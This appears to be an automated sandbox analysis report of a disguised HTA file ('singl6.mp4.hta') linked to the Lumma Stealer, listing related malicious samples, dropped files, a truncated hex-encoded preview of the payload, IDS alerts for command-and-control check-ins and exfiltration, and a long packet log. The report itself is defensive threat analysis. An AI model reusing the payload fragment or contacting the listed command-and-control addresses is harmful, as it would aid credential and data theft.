                                                                    acronis recovery expert deluxe 1.0.0.132.rarl.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.37.173
                                                                    Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                    • 104.21.37.173
                                                                    a0e9f5d64349fb13191bc781f81f42e1eMBO6wS1b5.exeGet hashmaliciousLummaC StealerBrowse
                                                                    • 104.21.64.1
                                                                    qoqD1RxV0F.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.64.1
                                                                    txUcQFc0aJ.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.64.1
                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.64.1
                                                                    Adobe GenP 5.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.64.1
                                                                    Setup_W.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.64.1
                                                                    iviewers.dllGet hashmaliciousLummaCBrowse
                                                                    • 104.21.64.1
                                                                    Loader.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.64.1
                                                                    Collapse.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.64.1
                                                                    Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                    • 104.21.64.1

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):5829
                                                                    Entropy (8bit):4.901113710259376
                                                                    Encrypted:false
                                                                    SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                    MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                    SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                    SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                    SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):1328
                                                                    Entropy (8bit):5.427284126716606
                                                                    Encrypted:false
                                                                    SSDEEP:24:3KaWSKco4KmM6GjKbmOIKo+mN1s4RPQoU99t7J0gt/NK3R8UHrg8g:PWSU4Yymp+ms4RIoU99tK8NWR8WNg
                                                                    MD5:A7B8178BF4F237141EEDF93BF1613D7F
                                                                    SHA1:AD96F02D899066006283C29EDF01FC97E907E1F2
                                                                    SHA-256:1CFCD00B08CC618F3E9F1EE4C3A72FAA214D3C13FAF1E320CBE6813A4AE06148
                                                                    SHA-512:92FAAEC46BB29320D2EC54A76BF7AB3C97AFE816E5E05FE449686280BBE44E9F2D5D0B0A45D2007B69E9C7DD5DF9D47D6D4778D1D863280C488B8265AC66F493
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0cchj52y.oki.psm1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kmkufxcr.x0u.ps1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s2nfwsmt.n2j.psm1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vusaxqh3.fch.ps1

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    Static File Info

                                                                    General

                                                                    File type:data
                                                                    Entropy (8bit):6.145372514924513
                                                                    TrID:
                                                                      File name:singl6.mp4.hta
                                                                      File size:642'968 bytes
                                                                      MD5:543530c3b4038086637accf9d95397d6
                                                                      SHA1:617115dda0f8553d7dd5cee8d0dc2ddec461c59c
                                                                      SHA256:d070fad55be0d3269dbebb1de70652d82d48f0ad849f960d27d3e71018eb208c
                                                                      SHA512:45f190d4ade1a1af105f93566cfe34285a47fc9a1e2124c7b9ec787a262f8085a8a3659276a2a0a8dbd4243602af41a6aa89e77ade405fb4df5a2a6865d56db2
                                                                      SSDEEP:6144:5/SWP1PkrKeNSuBev+ezCCsese4tAeLkepSBIkYMJMelek2efeFOelI/:5PPBM2
                                                                      TLSH:F1D4C0465A730614C87AC934EED7CA282471BDC86C04C7AE4ACDB43534A75B87ED6AFC
                                                                      File Content Preview:66D75V6ed63S74T69B6fN6ev20D4eO57j6aZ4eK28h65L4fz46a5ad64s29I7bS76n61r72n20y66g6cp6dM4fp3dy20t27y27A3be66f6fs72B20S28S76N61D72d20I52l59v4co41u20r3dR20G30o3bS52j59E4ca41P20e3cp20U65m4fL46B5aG64E2eV6ck65Z6eg67B74T68y3bH20K52e59E4cp41f2bF2bs29J7bl76x61u72i20K

                                                                      Network Behavior

                                                                      Suricata IDS Alerts

                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-12-24T08:30:54.939000+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649958104.21.64.1443TCP
                                                                      2024-12-24T08:30:55.679946+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649958104.21.64.1443TCP
                                                                      2024-12-24T08:30:55.679946+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649958104.21.64.1443TCP
                                                                      2024-12-24T08:30:56.919568+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649964104.21.64.1443TCP
                                                                      2024-12-24T08:30:57.972737+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649964104.21.64.1443TCP
                                                                      2024-12-24T08:30:57.972737+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649964104.21.64.1443TCP
                                                                      2024-12-24T08:30:59.497997+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649971104.21.64.1443TCP
                                                                      2024-12-24T08:31:01.655083+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649976104.21.64.1443TCP
                                                                      2024-12-24T08:31:04.101207+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649982104.21.64.1443TCP
                                                                      2024-12-24T08:31:06.366740+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649989104.21.64.1443TCP
                                                                      2024-12-24T08:31:07.135086+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649989104.21.64.1443TCP
                                                                      2024-12-24T08:31:09.432037+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649995104.21.64.1443TCP
                                                                      2024-12-24T08:31:13.036558+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649996104.21.64.1443TCP
                                                                      2024-12-24T08:31:13.848961+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649996104.21.64.1443TCP

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Dec 24, 2024 08:29:09.843478918 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:09.843560934 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:09.843781948 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:09.853312969 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:09.853351116 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.078913927 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.078996897 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:11.081104040 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:11.081123114 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.081440926 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.092808008 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:11.135332108 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.762990952 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.763173103 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.763258934 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.763307095 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:11.763371944 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.763498068 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:11.763518095 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.771116018 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.771198988 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:11.771215916 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.779356956 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.779623985 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:11.779640913 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.787792921 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.787924051 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:11.787945032 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.829026937 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:11.882253885 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.922734022 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:11.922754049 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.958317995 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.958417892 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.958440065 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:11.958457947 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.958583117 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:11.966092110 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.969185114 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.969295025 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:11.969312906 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.976993084 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.977145910 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:11.977164030 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.984803915 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:11.984899044 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:11.984927893 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.000396967 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.000488997 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.000534058 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.000556946 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.000643969 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.008451939 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.015971899 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.016055107 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.016246080 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.016263008 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.016367912 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.023797989 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.030214071 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.030297041 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.030316114 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.030342102 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.030428886 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.060579062 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.065004110 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.065078974 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.065095901 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.110328913 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.110348940 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.146646023 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.146728039 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.146745920 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.153358936 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.153386116 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.153474092 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.153475046 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.153510094 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.157804966 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.158448935 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.158476114 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.162412882 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.162636042 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.162651062 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.171042919 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.171150923 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.171165943 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.172034979 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.175201893 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.179510117 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.179636955 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.179651976 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.183886051 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.184001923 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.184016943 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.188196898 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.188496113 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.188519001 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.192429066 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.193018913 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.193032980 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.196728945 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.196791887 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.196806908 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.201141119 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.201220036 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.201232910 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.205400944 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.205625057 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.205640078 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.208472013 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.208580971 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.208595991 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.211967945 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.212037086 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.212050915 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.214165926 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.214256048 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.214270115 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.217125893 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.217334032 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.217361927 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.220012903 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.220146894 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.220161915 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.222867966 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.222986937 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.223017931 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.268357992 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.268414974 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.268448114 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.268610001 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.268733025 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.272609949 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.273066998 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.275434017 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.275535107 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.278306961 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.278387070 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.339775085 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.339845896 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.339894056 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.340012074 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.343441010 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.343540907 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.346112967 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.346185923 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.348701000 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.348773003 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.351193905 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.351335049 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.353678942 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.353796005 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.356189013 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.356409073 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.358671904 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.358823061 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.363693953 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.363776922 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.363791943 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.364159107 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.366120100 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.368010044 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.370935917 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.371042013 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.373404980 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.373666048 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.375840902 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.375972986 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.375986099 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.380817890 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.380878925 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.380893946 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.380956888 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.383270979 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.383641958 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.385796070 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.385873079 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.390773058 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.390865088 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.393260956 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.393371105 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.396044016 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.396116972 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.397809029 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.397890091 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.399652958 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.399744034 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.401403904 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.401473045 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.404998064 CET44349719104.21.37.173192.168.2.6
                                                                      Dec 24, 2024 08:29:12.405116081 CET49719443192.168.2.6104.21.37.173
                                                                      Dec 24, 2024 08:29:12.406769037 CET44349719104.21.37.173192.168.2.6
